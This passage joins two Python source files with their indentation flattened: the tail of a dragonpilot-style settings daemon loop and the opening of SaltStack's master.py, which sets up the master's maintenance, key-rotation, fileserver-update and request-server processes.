rk = Ratekeeper(HERTZ, print_delay_threshold=None) # Keeps rate at 2 hz
uploader_thread = None
while True:
if uploader_thread is None:
uploader_thread = threading.Thread(target=gpx_uploader_thread)
uploader_thread.start()
msg = messaging.new_message('dragonConf')
if last_dp_msg is not None:
msg.dragonConf = last_dp_msg
'''
===================================================
load thermalState data every 3 seconds
===================================================
'''
if frame % (HERTZ * 3) == 0:
sm.update(0)
if sm.updated['deviceState']:
started = sm['deviceState'].started
free_space = sm['deviceState'].freeSpacePercent
'''
===================================================
hotspot on boot
we do it after 30 secs just in case
===================================================
'''
if is_eon and frame == (HERTZ * 30) and param_get("dp_hotspot_on_boot", "bool", False):
os.system("service call wifi 37 i32 0 i32 1 &")
'''
===================================================
check dp_last_modified every second
===================================================
'''
if not update_params:
last_modified_check, modified = get_last_modified(LAST_MODIFIED_SYSTEMD, last_modified_check, modified)
if last_modified != modified:
update_params = True
last_modified = modified
'''
===================================================
conditionally set update_params to true
===================================================
'''
# force updating param when `started` changed
if last_started != started:
update_params = True
if frame == 0:
update_params = True
'''
===================================================
push param vals to message
===================================================
'''
if update_params:
msg = update_conf_all(confs, msg, frame == 0)
update_params = False
'''
===================================================
push once
===================================================
'''
if frame == 0:
setattr(msg.dragonConf, get_struct_name('dp_locale'), params.get("dp_locale"))
# mirror EndToEndToggle to dp_lane_less_model_ctrl first time, after all
put_nonblocking('dp_lane_less_mode_ctrl', "1" if params.get_bool('EndToEndToggle') else "0")
'''
===================================================
push ip addr every 10 secs
===================================================
'''
if frame % (HERTZ * 10) == 0:
msg = update_ip(msg)
'''
===================================================
update msg based on some custom logic
===================================================
'''
msg = update_custom_logic(msg)
'''
===================================================
battery ctrl every 30 secs
PowerMonitor in thermald turns back on every mins
so lets turn it off more frequent
===================================================
'''
# if frame % (HERTZ * 30) == 0:
# last_charging_ctrl = process_charging_ctrl(msg, last_charging_ctrl, battery_percent)
'''
===================================================
dashcam
===================================================
'''
if msg.dragonConf.dpDashcamd and frame % HERTZ == 0:
dashcamd.run(started, free_space)
'''
===================================================
finalise
===================================================
'''
last_dp_msg = msg.dragonConf
last_started = started
pm.send('dragonConf', msg)
frame += 1
rk.keep_time()
def update_conf(msg, conf, first_run = False):
conf_type = conf.get('conf_type')
if 'param' in conf_type and 'struct' in conf_type:
access_time = os.path.getatime(PARAM_PATH + conf['name'])
if (last_modified_confs.get(conf['name'])) is not None and last_modified_confs.get(conf['name']) == access_time:
return msg
update_this_conf = True
if not first_run:
update_once = conf.get('update_once')
if update_once is not None and update_once is True:
return msg
if update_this_conf:
update_this_conf = check_dependencies(msg, conf)
if update_this_conf:
msg = set_message(msg, conf)
if os.path.isfile(PARAM_PATH + conf['name']):
last_modified_confs[conf['name']] = access_time
return msg
def update_conf_all(confs, msg, first_run = False):
for conf in confs:
msg = update_conf(msg, conf, first_run)
return msg
def process_charging_ctrl(msg, last_charging_ctrl, battery_percent):
charging_ctrl = msg.dragonConf.dpChargingCtrl
if last_charging_ctrl != charging_ctrl:
HARDWARE.set_battery_charging(True)
if charging_ctrl:
if battery_percent >= msg.dragonConf.dpDischargingAt and HARDWARE.get_battery_charging():
HARDWARE.set_battery_charging(False)
elif battery_percent <= msg.dragonConf.dpChargingAt and not HARDWARE.get_battery_charging():
HARDWARE.set_battery_charging(True)
return charging_ctrl
def update_custom_logic(msg):
if msg.dragonConf.dpAtl:
msg.dragonConf.dpAllowGas = True
msg.dragonConf.dpGearCheck = False
if not msg.dragonConf.dpAtlOpLong:
# msg.dragonConf.dpFollowingProfileCtrl = False
msg.dragonConf.dpAccelProfileCtrl = False
if msg.dragonConf.dpLcMinMph > msg.dragonConf.dpLcAutoMinMph:
put_nonblocking('dp_lc_auto_min_mph', str(msg.dragonConf.dpLcMinMph))
msg.dragonConf.dpLcAutoMinMph = msg.dragonConf.dpLcMinMph
# if msg.dragonConf.dpSrCustom <= 4.99 and msg.dragonConf.dpSrStock > 0:
# put_nonblocking('dp_sr_custom', str(msg.dragonConf.dpSrStock))
# msg.dragonConf.dpSrCustom = msg.dragonConf.dpSrStock
# if msg.dragonConf.dpAppWaze or msg.dragonConf.dpAppHr:
# msg.dragonConf.dpDrivingUi = False
# if not msg.dragonConf.dpDriverMonitor:
# msg.dragonConf.dpUiFace = False
return msg
def update_ip(msg):
val = 'N/A'
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = 'N/A'
finally:
s.close()
setattr(msg.dragonConf, get_struct_name('dp_ip_addr'), IP)
return msg
def set_message(msg, conf):
val = params.get(conf['name'], encoding='utf8')
if val is not None:
val = val.rstrip('\x00')
else:
val = conf.get('default')
params.put(conf['name'], str(val))
struct_val = to_struct_val(conf['name'], val)
orig_val = struct_val
if struct_val is not None:
if conf.get('min') is not None:
struct_val = max(struct_val, conf.get('min'))
if conf.get('max') is not None:
struct_val = min(struct_val, conf.get('max'))
if orig_val != struct_val:
params.put(conf['name'], str(struct_val))
setattr(msg.dragonConf, get_struct_name(conf['name']), struct_val)
return msg
def check_dependencies(msg, conf):
passed = True
# if has dependency and the depend param val is not in depend_vals, we dont update that conf val
# this should reduce chance of reading unnecessary params
dependencies = conf.get('depends')
if dependencies is not None:
for dependency in dependencies:
if getattr(msg.dragonConf, get_struct_name(dependency['name'])) not in dependency['vals']:
passed = False
break
return passed
def main():
confd_thread()
if __name__ == "__main__":
main()
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import ctypes
import functools
import os
import re
import sys
import time
import signal
import stat
import logging
import collections
import multiprocessing
import threading
import salt.serializers.msgpack
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=import-error,no-name-in-module,redefined-builtin
import tornado.gen # pylint: disable=F0401
# Import salt libs
import salt.crypt
import salt.client
import salt.client.ssh.client
import salt.exceptions
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.key
import salt.acl
import salt.engines
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.transport.server
import salt.log.setup
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.transport import iter_transport_opts
from salt.utils.debug import (
enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
# Import halite libs
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
from tornado.stack_context import StackContext
from salt.utils.ctx import RequestContext
log = logging.getLogger(__name__)
class SMaster(object):
'''
Create a simple salt-master, this will generate the top-level master
'''
secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
'''
Create a salt master server instance
:param dict opts: The salt options dictionary
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state['opts']
self.master_key = state['master_key']
self.key = state['key']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {'opts': self.opts,
'master_key': self.master_key,
'key': self.key,
'secrets': SMaster.secrets}
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
return salt.daemons.masterapi.access_keys(self.opts)
class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A generalized maintenance process which performs maintenance routines.
'''
def __init__(self, opts, **kwargs):
'''
Create a maintenance instance
:param dict opts: The salt options
'''
super(Maintenance, self).__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts['loop_interval'])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _post_fork_init(self):
'''
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
'''
# Load Runners
ropts = dict(self.opts)
ropts['quiet'] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(self.opts,
runner_client.functions_dict(),
returners=self.returners)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if not tcp_only:
# For a TCP only transport, the presence events will be
# handled in the transport code.
self.presence_events = True
def run(self):
'''
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
'''
Evaluate accepted keys and create a msgpack file
which contains a list
'''
if self.opts['key_cache'] == 'sched':
keys = []
#TODO DRY from CKMinions
if self.opts['transport'] in ('zeromq', 'tcp'):
acc = 'minions'
else:
acc = 'accepted'
for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)):
if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)):
keys.append(fn_)
log.debug('Writing master key cache')
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file:
self.serial.dump(keys, cache_file)
def handle_key_rotate(self, now):
'''
Rotate the AES key rotation
'''
to_rotate = False
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error('Found dropfile with incorrect permissions, ignoring...')
os.remove(dfn)
except os.error:
pass
if self.opts.get('publish_session'):
if now - self.rotate >= self.opts['publish_session']:
to_rotate = True
if to_rotate:
log.info('Rotating master AES key')
for secret_key, secret_map in six.iteritems(SMaster.secrets):
# should be unnecessary-- since no one else should be modifying
with secret_map['secret'].get_lock():
secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']())
self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key')
self.rotate = now
if self.opts.get('ping_on_rotate'):
# Ping all minions to get them to pick up the new key
log.debug('Pinging all connected minions '
'due to key rotation')
salt.utils.master.ping_all_connected_minions(self.opts)
def handle_git_pillar(self):
'''
Update git pillar
'''
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc:
log.error('Exception caught while updating git_pillar',
exc_info=True)
def handle_schedule(self):
'''
Evaluate the scheduler
'''
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
def handle_presence(self, old_present):
'''
Fire presence events if enabled
'''
if self.presence_events:
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
self.event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
self.event.fire_event(data, tagify('present', 'presence'), timeout=3)
old_present.clear()
old_present.update(present)
class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A process from which to update any dynamic fileserver backends
'''
def __init__(self, opts, **kwargs):
super(FileserverUpdate, self).__init__(**kwargs)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
)
def __getstate__(self):
return {'opts': self.opts,
'log_queue': self.log_queue,
}
def fill_buckets(self):
'''
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
'''
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
for backend in self.fileserver.backends():
fstr = '{0}.update'.format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug(
'No update function for the %s filserver backend',
backend
)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in six.iteritems(update_intervals[backend]):
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
'An update_interval of 0 is not supported, '
'falling back to %s', interval
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = '{0}_update_interval'.format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.warning(
'%s key missing from configuration. Falling back to '
'default interval of %d seconds',
interval_key, interval
)
self.buckets.setdefault(
interval, OrderedDict())[(backend, update_func)] = None
def update_fileserver(self, interval, backends):
'''
Threading target which handles all updates for a given wait interval
'''
def _do_update():
log.debug(
'Performing fileserver updates for items with an update '
'interval of %d', interval
)
for backend, update_args in six.iteritems(backends):
backend_name, update_func = backend
try:
if update_args:
log.debug(
'Updating %s fileserver cache for the following '
'targets: %s', backend_name, update_args
)
args = (update_args,)
else:
log.debug('Updating %s fileserver cache', backend_name)
args = ()
update_func(*args)
except Exception as exc:
log.exception(
'Uncaught exception while updating %s fileserver '
'cache', backend_name
)
log.debug(
'Completed fileserver updates for items with an update '
'interval of %d, waiting %d seconds', interval, interval
)
condition = threading.Condition()
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
def run(self):
'''
Start the update threads
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver,
args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
:param dict: The salt options
'''
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... macOS reports RLIM_INFINITY as
# hard limit,but raising to anything above soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: %s/%s',
mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, %s, is higher '
'than the highest value the user running salt is allowed to '
'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to %s', mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: %s/%s',
mof_s, mof_h
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to %s. If this '
'value is too low, the salt-master will most likely fail '
'to run properly.', mof_c
)
def _pre_flight(self):
'''
Run pre flight checks. If anything in this method fails then the master
should not start up.
'''
errors = []
critical_errors = []
try:
os.chdir('/')
except OSError as err:
errors.append(
'Cannot change to root directory ({0})'.format(err)
)
if self.opts.get('fileserver_verify_config', True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append('{0}'.format(exc))
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
# Check to see if we need to create a pillar cache dir
if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache'))
except OSError:
pass
if self.opts.get('git_pillar_verify_config', True):
try:
git_pillars = [
x for x in self.opts.get('ext_pillar', [])
if 'git' in x
and not isinstance(x['git'], six.string_types)
]
except TypeError:
git_pillars = []
critical_errors.append(
'Invalid ext_pillar configuration. It is likely that the '
'external pillar type was not specified for one or more '
'external pillars.'
)
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts['ext_pillar'] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo['git'],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical('Master failed pre flight checks, exiting\n')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets['aes'] = {
'secret': multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
)
),
'reload': salt.crypt.Crypticle.generate_key_string
}
log.info('Creating master process manager')
# Since there are children having their own ProcessManager we should wait for kill more time.
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info('Creating master publisher process')
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
pub_channels.append(chan)
log.info('Creating master event publisher process')
self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,))
if self.opts.get('reactor'):
if isinstance(self.opts['engines'], list):
rine = False
for item in self.opts['engines']:
if 'reactor' in item:
rine = True
break
if not rine:
self.opts['engines'].append({'reactor': {}})
else:
if 'reactor' not in self.opts['engines']:
log.info('Enabling the reactor engine')
self.opts['engines']['reactor'] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info('Creating master maintenance process')
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get('event_return'):
log.info('Creating master event return process')
self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,))
ext_procs = self.opts.get('ext_processes', [])
for proc in ext_procs:
log.info('Creating ext_processes process: %s', proc)
try:
mod = '.'.join(proc.split('.')[:-1])
cls = proc.split('.')[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception:
log.error('Error creating ext_processes process: %s', proc)
if HAS_HALITE and 'halite' in self.opts:
log.info('Creating master halite process')
self.process_manager.add_process(Halite, args=(self.opts['halite'],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts['con_cache']:
log.info('Creating master concache process')
self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,))
# workaround for issue #16315, race condition
log.debug('Sleeping for two seconds to let concache rest')
time.sleep(2)
log.info('Creating master request server process')
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue()
kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level()
kwargs['secrets'] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name='ReqServer')
self.process_manager.add_process(
FileserverUpdate,
args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts['discovery']:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts['discovery']['port'],
listen_ip=self.opts['interface'],
answer={'mapping': self.opts['discovery'].get('mapping', {})}).run)
else:
log.error('Unable to load SSDP: asynchronous IO is not available.')
if sys.version_info.major == 2:
log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.')
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Manage the Halite server
'''
def __init__(self, hopts, **kwargs):
'''
Create a halite instance
:param dict hopts: The halite options
'''
super(Halite, self).__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['hopts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'hopts': self.hopts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def run(self):
'''
Fire up halite!
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
'''
Create a request server
:param dict opts: The salt options dictionary
:key dict: The user starting the server and the AES key
:mkey dict: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
'''
super(ReqServer, self).__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['key'],
state['mkey'],
secrets=state['secrets'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'key': self.key,
'mkey': self.master_key,
'secrets': self.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super(ReqServer, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Binds the reply server
'''
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
# Wait for kill should be less then parent's ProcessManager.
self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager',
wait_for_kill=1)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != 'tcp':
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = self.log_queue
kwargs['log_queue_level'] = self.log_queue_level
# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1:
log.warning('TCP transport supports only 1 worker on Windows '
'when using Python 2.')
self.opts['worker_threads'] = 1
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts['worker_threads'])):
name = 'MWorker-{0}'.format(ind)
self.process_manager.add_process(MWorker,
args=(self.opts,
self.master_key,
self.key,
req_channels,
name),
kwargs=kwargs,
name=name)
self.process_manager.run()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, 'process_manager'):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
def __del__(self):
self.destroy()
class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
req_channels,
name,
**kwargs):
'''
Create a salt master worker process
:param dict opts: The salt options
:param dict mkey: The user running the salt master and the AES key
:param dict key: The user running the salt master and the RSA key
:rtype: MWorker
:return: Master worker
'''
kwargs['name'] = name
self.name = name
super(MWorker, self).__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {'mean': 0, 'latency': 0, 'runs': 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self._is_child = True
super(MWorker, self).__init__(
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
self.opts = state['opts']
self.req_channels = state['req_channels']
self.mkey = state['mkey']
self.key = state['key']
self.k_mtime = state['k_mtime']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {
'opts': self.opts,
'req_channels': self.req_channels,
'mkey': self.mkey,
'key': self.key,
'k_mtime': self.k_mtime,
'secrets': SMaster.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, 'req_channels', ()):
channel.close()
super(MWorker, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Bind to the local port
'''
# using ZMQIOLoop since we *might* need zmq in there
